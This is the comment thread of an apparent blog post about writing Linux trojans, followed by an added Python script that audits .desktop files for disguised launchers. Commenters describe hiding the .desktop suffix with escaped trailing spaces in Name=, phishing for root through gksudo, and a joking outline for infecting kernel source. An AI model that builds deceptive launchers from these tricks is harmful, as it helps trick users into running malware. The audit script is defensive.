Xubuntu seems to flag a file as potential malware if it looks like it has a file extension other than ".desktop". It's easily defeated by appending a space to the file, for example,

Name=some_text.odt\

Unfortunately for malware writers, this requires two versions of the launcher, since the method above only works in XFCE. Xubuntu allows the escaped spaces, but Gnome requires a backslash-s for the same effect and will display the backslash otherwise.


Comment by penguin007, on 19-Jun-2009 16:21

Interesting article, despite all the noisy comments. One MAJOR attack vector on any OS is the interpreted languages. Whilst feeble (because that's what they are) AV software can try and stop executables, the scripting languages (like Python) cannot be stopped that way. The point is that Python itself (cpython, the interpreter) is of course "trusted". Whatever Python code I write for the interpreter to run, will run; even if I use os.system(-- cmds here --). So all I really need to do is ask the user nicely via gksudo for his root password, and bam! All over. Even worse: if the user has associated .py files with Python, then double clicking them will simply run them.

Once you get the user to click on anything it's game over. And I am afraid that with more n00bs starting to play with Linux this is going to become a real threat.

(And by the way: the launcher attack described above can be launched from any directory, not just the Desktop. Gnome gives a feeble warning message, but if you click "Launch Anyway" it's all over.)


Comment by bambambox, on 18-Jul-2009 01:30

Aww man, I wish I'd found this blog before. I posted pretty much the exact same description of a root exploit on the Ubuntu Forums and subsequently got banhammered for spreading FUD. I only wanted to know if it was a feasible exploit. Well, it seems my suspicions were confirmed. It isn't a virus, per se, just the old trojan horse tactic. Hard to spread those on Linux, as most users are clued up on this sort of thing. But, you never know.


Comment by cloudscream, on 3-Sep-2009 05:34

I find this article (and your comments) very useful and educating. Thanks!
How do you forward this article to one of the Gnome or KDE devs? Have you ever thought of contributing to or joining their team?


Comment by DJ Shaji, on 3-Nov-2009 15:15

What is this, Seinfeld ? Much Ado about Nothing ?

The entire premise of this long ( and really uninteresting ) debate is that a user downloads an e-mail attachment to his desktop, and then "double clicks" it. I haven't double clicked anything in a long time. Like any other simple Linux user, I use the shell -> bash( tty, xterm, gnome-terminal )

This isn't a virus - a trojan, a worm, or really anything at all. The user is simply telling the system what to do! If you click on a "launcher" you're the friggin' idiot who's responsible. It is expected behavior. What the hell is the matter with you? Can't you simply right-click the file, open it in a text editor before you choose to execute it? You got it from the damn internet. We all know how insecure that can be. And, with all due respect, how can a ".desktop" file have nude shots of anything? I mean, it's a damn text file! Anybody who's spent a day or two with Linux would know that text files usually do not contain multimedia content. You obviously have too much free time.

By the way, how come you're writing python and bash scripts here to "make a virus in five easy steps"? Why can't you simply write C code and then mail that binary as an attachment? Wouldn't that be a better alternative? Use a statically linked binary and you're done! Where do you come off writing two-line python scripts and then declaring that Linux is unsafe and insecure?

Also, I saw here somebody saying that the NT model is secure. Yeah, right. Tell that to my friend who runs XP + torrent and then formats his system every other day because he got infected.

Peace out.


Comment by softraider, on 12-Nov-2009 20:55

Too much "complicity" from the user. No malware can be effective this way (fortunately). In fact, the only danger is the user's stupidity.


Comment by LucasXIIHK, on 24-Nov-2009 20:44

softraider, the user's stupidity is the worst virus in all the operating systems, not only in Linux. In Windows the "complicity" of the user is vital to execute a virus too.


Comment by jutso, on 20-Jan-2010 04:32

Hello Foobar,

I'm an editor of freiesMagazin, a German Linux and Open Source
periodical (http://freiesmagazin.de).

I have a request: May we translate your article "How to write a Linux
virus in 5 easy steps" and publish it under the GNU Free Documentation
License in freiesMagazin?

I'm looking forward to your reply (redaktionATfreies-magazin.de)

Best regards

Thorsten Schmidt


Comment by Jingis Han, on 26-Jan-2010 07:04

Thanks for this article!
I'm not a programmer, but in the past I used only my imagination to know that Linux is easy to hack; you explain it well.
I wonder why some people argue with the truth?
The lie "There are no viruses for Linux" is the worst thing I've heard!
This is the main reason why the viruses for Linux will increase soon!
There is no good and free antivirus for Linux!
I tried to install some; I couldn't install any of them; only clamav I could install successfully.
Sorry for my English...
You are really the first man who discovered the sad truth about Linux security, and the worse thing is that Linux users don't want to know that Linux is also damaged by bad software as Windows is.
I like Linux and I'm using it every day, but if someone tells me or someone else: "use Linux because there are no viruses and spyware for it" I'm crying!


Comment by F, on 13-Feb-2010 06:39

How to write a virus for the Linux ecosystem

All approaches I've read apply closed-source approaches to
virus writing on Linux. They work by manipulating native code
or use half-arsed scripting methods. The way to write a Linux
virus is by embracing open-source. Userland has access to kernel-land's source:

0: are we in kernel-land ? goto 7 : NOP
1: search for kernel source files
2: pick a kernel source file with interesting core functions
3: insert virus source code inside core function(s)
4: compress other parts of the source to compensate change in filesize
5: clean tracks (datestamp & stuff)
6: exit
7: welcome to kernel-land
8: $$$

Since the linux ecosystem is open source, we know where the goodies are.
Since the virus is inherently open source, it's license compliant.

Best wishes,
FD from Ghanda


Comment by Vallaryn, on 16-Feb-2010 01:08

I must agree, Gnothi.

Linux and no other OS can be stupid-proof! What you talk about here is merely end-user dumbness putting the whole system in danger.

Sorry if I sound a little arrogant or so, but all that you have done here was to prove, in many terms, that Linux IS virus-proof, because every step here needs user interaction...

Yeah, the "virus" here resides in between the keyboard and the chair...


Comment by marc san pedro, on 1-May-2010 18:39

This might be the worst example of a virus I've ever heard. I enjoyed the well-informed article, but it involves so many assumptions that it's kind of ridiculous. I don't think any knowledgeable user would say Linux is 'virus free', more like its immune system is in a much better position than that of Windows... etc.

We could also say... it's easy for a virus to destroy Windows if a user logs in as 'root' and issues commands like rm -r -f *, etc....

At any rate... point taken, there should be more work on KDE/GNOME to prevent such behaviour as you mentioned... I think some of this has already happened.


Comment by poacheR, on 6-Dec-2010 12:04

Hi foobar.

I read your article with great interest.
I was almost disappointed to find out the issues you raised have now been addressed: desktop files now have #!/usr/bin/env xdg-open as the first line, as was suggested, and need to be set as executable to act as launchers. Otherwise, the .desktop suffix becomes visible and the system refuses to launch it, saying it is untrusted.

Your article still comes up as one of the top links in google (in fact it's 2nd below the wikipedia entry on linux malware!) in a "linux virus" search. And it's certainly the most eye-catching in that list :)

Maybe it's time for a small update? :)
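Steve Hanov's comment on escaped trailing spaces in the `Name=` field and poacheR's on the execute bit together describe what a defender would look for when triaging a `.desktop` file that arrived as an attachment. The following is an added example (not code from the blog or from either commenter) that parses a desktop entry and reports the signs that distinguish a disguised launcher from an ordinary one: a `Name` padded with `\ ` or `\s` to hide the suffix, a name that ends in a document or image extension, an `Exec` whose command is resolved through PATH or hands an inline script to an interpreter, and the execute bit that newer desktops require before launching. The two sample entries are constructed; the list of "document" extensions and interpreter names is an assumption, not a standard.

```python
import os
import shlex
import stat
import tempfile
from configparser import ConfigParser, Error as ConfigError

# Extensions a user would expect on a document or media file, not on a launcher (assumption).
DOCUMENT_EXTENSIONS = (".odt", ".ods", ".doc", ".docx", ".pdf", ".txt",
                       ".jpg", ".jpeg", ".png", ".gif", ".mp3", ".avi")
# Interpreters that accept a whole script on the command line via -c (assumption).
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl", "ruby"}

# Constructed samples: a launcher dressed up as a photo, and an ordinary editor launcher.
SAMPLE_DISGUISED = (
    "[Desktop Entry]\n"
    "Type=Application\n"
    "Name=holiday_photos.jpg\\ \n"        # trailing "\ " hides the .desktop suffix
    "Exec=python -c 'print(1)'\n"
    "Icon=image-jpeg\n"
)
SAMPLE_BENIGN = (
    "#!/usr/bin/env xdg-open\n"
    "[Desktop Entry]\n"
    "Type=Application\n"
    "Name=Text Editor\n"
    "Exec=/usr/bin/gedit %U\n"
)


def visible_name(name):
    """Strip trailing whitespace and the escaped forms ('\\ ' and '\\s') that a
    launcher can append to Name= so the file manager shows only the fake suffix."""
    while True:
        name = name.rstrip(" \t")
        if name.endswith("\\s"):
            name = name[:-2]
        elif name.endswith("\\"):
            name = name[:-1]
        else:
            return name


def audit_desktop_entry(text, mode):
    """Return (field, message) findings for a .desktop file's text and st_mode."""
    parser = ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # desktop-entry keys are case-sensitive
    try:
        parser.read_string(text)  # a leading "#!" line is treated as a comment
    except ConfigError:
        return [("format", "not a parsable desktop entry")]
    if not parser.has_section("Desktop Entry"):
        return [("format", "no [Desktop Entry] group")]
    entry = parser["Desktop Entry"]
    findings = []
    name = entry.get("Name", "")
    shown = visible_name(name)
    if shown != name:
        findings.append(("Name", "trailing escaped whitespace hides the .desktop suffix"))
    if shown.lower().endswith(DOCUMENT_EXTENSIONS):
        findings.append(("Name", "launcher is named like a document: %r" % shown))
    if entry.get("Type") == "Application":
        try:
            argv = shlex.split(entry.get("Exec", ""))
        except ValueError:
            argv = []
            findings.append(("Exec", "unparsable command line"))
        if argv and not os.path.isabs(argv[0]):
            findings.append(("Exec", "%r is resolved through PATH, not a fixed location" % argv[0]))
        if len(argv) >= 3 and argv[1] == "-c" and os.path.basename(argv[0]) in INTERPRETERS:
            findings.append(("Exec", "inline script handed to %s" % argv[0]))
        if mode & stat.S_IXUSR:
            findings.append(("mode", "execute bit set: desktops that require it will launch without a trust warning"))
    return findings


def audit_desktop_file(path):
    """Audit a .desktop file on disk, using its real permission bits."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        text = handle.read()
    return audit_desktop_entry(text, os.stat(path).st_mode)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "holiday_photos.jpg.desktop")
        with open(path, "w", encoding="utf-8") as handle:
            handle.write(SAMPLE_DISGUISED)
        os.chmod(path, 0o755)
        for field, message in audit_desktop_file(path):
            print("%s: %s" % (field, message))
```

Pointing `audit_desktop_file` at everything under `~/Desktop`, `~/Downloads` and `~/.local/share/applications` gives a quick sweep; an entry that triggers the `Name` findings together with the `mode` finding is the combination the article's launcher relies on, while a non-executable file without a disguised name is what the newer desktops already refuse to run.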



foobar's profile

 
New Zealand


  • Who I am: Software developer and consultant.
  • What I do: System level programming, Linux/Unix. C, C++, Java, Python, and a long time ago even Assembler.
  • What I like: I'm a big fan of free and open source software. I'm Windows-free, running Ubuntu on my laptop. To a somewhat lesser degree, I also follow the SaaS industry.
  • Where I have been: Here and there, all over the place.



